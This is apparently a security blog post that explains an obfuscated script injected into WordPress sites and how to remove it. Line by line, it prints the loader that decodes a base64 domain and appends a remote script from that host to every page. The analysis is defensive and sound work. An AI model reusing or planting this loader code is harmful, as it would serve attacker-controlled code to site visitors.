Introduction
WordPress, being the most popular content management system (CMS), is a common target for cyberattacks. Recently, a malicious script loading from crazzycdn.com
has been discovered on numerous WordPress websites. This article explains how the script works, the risks it poses, and steps to remove it and secure your site.
How the Malicious Script Works
The malicious script is designed to load a JavaScript file from the domain crazzycdn.com
. It dynamically constructs a URL based on the current timestamp, ensuring the loaded script is always up-to-date. Here’s a breakdown of the script:
Calculate the timestamp:
var _0x2196a7 = Math['floor'](Date['now']() / 0x3e8)
: This gets the current timestamp in seconds._0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10
: This rounds down the timestamp to the nearest multiple of 3600 (0xe10 in hexadecimal).
Adjust the timestamp:
_0x2196a7 -= _0x2196a7 % 0x258
: This further adjusts the timestamp to the nearest multiple of 600 (0x258 in hexadecimal)._0x2196a7 = _0x2196a7['toString'](0x10)
: Converts the adjusted timestamp to a hexadecimal string.
Check the document referrer:
if (!document['referrer']) return;
: If there is no referrer, the script terminates.
Decode the URL:
let _0x9cf45e = atob('Y3Jhe' + 'nkyY2Ru' + 'LmNvbQ==');
: This decodes the base64 encoded string'Y3JhenkyY2RuLmNvbQ=='
to'crazzycdn.com'
.
Create and append the script:
(_0x24b800 = _0x26d259['createElem' + 'ent']('script'))
: Creates a new script element.['type'] = 'text/javas' + 'cript'
: Sets the type attribute to ‘text/javascript’.['async'] = !0x0
: Sets the async attribute to true.['src'] = 'https://' + _0x9cf45e + '/min.t.' + _0xcb1eb8 + '.js?v=' + _0x2196a7
: Sets the src attribute to a URL constructed with the decoded domain, timestamp, and version._0x26d259['getElement' + 'sByTagName']('head')[0x0]['appendChil' + 'd'](_0x24b800);
: Appends the script element to the head of the document.
Key Components:
- Timestamp Calculation: The script calculates a timestamp and rounds it to the nearest hour and ten minutes.
- URL Construction: It constructs a URL using the decoded domain
crazzycdn.com
and the calculated timestamp. - Script Loading: The script element is created and appended to the document’s head, loading the external JavaScript file.
Potential Risks:
- Malware Injection: The external script can inject malware or other malicious code into your website.
- Data Theft: It can steal sensitive information from your site and its visitors.
- SEO Poisoning: Malicious scripts can manipulate your site’s SEO to redirect traffic to harmful sites.
How to Detect and Remove the Malicious Script
Step 1: Locate the Script
- Theme Files: Check your theme files, especially
header.php
andfooter.php
. - Custom Scripts: Look for custom scripts added to your site.
Step 2: Remove the Script
Simply delete the malicious script from your files.
Step 3: Scan for Other Malicious Code
- Security Plugins: Use security plugins like Wordfence, Sucuri, or iThemes Security to scan your site.
- Manual Review: Manually review other theme and plugin files for suspicious code.
Enhance Your Site’s Security
Change Passwords
- Update passwords for your WordPress admin, database, hosting account, and other associated services.
Update WordPress
- Ensure your WordPress core, themes, and plugins are up-to-date.
Use Security Plugins
- Install security plugins to add layers of protection, such as firewall rules and malware scanning.
Harden WordPress
- Follow WordPress hardening guidelines to secure your site.
Monitor for Changes
- Set up monitoring to alert you of unauthorized changes.
Conclusion
The crazzycdn .com
script is a significant security threat to WordPress websites. By following the steps outlined in this article, you can remove the malicious script and enhance your site’s security to prevent future attacks. Always stay vigilant and keep your site updated and secure.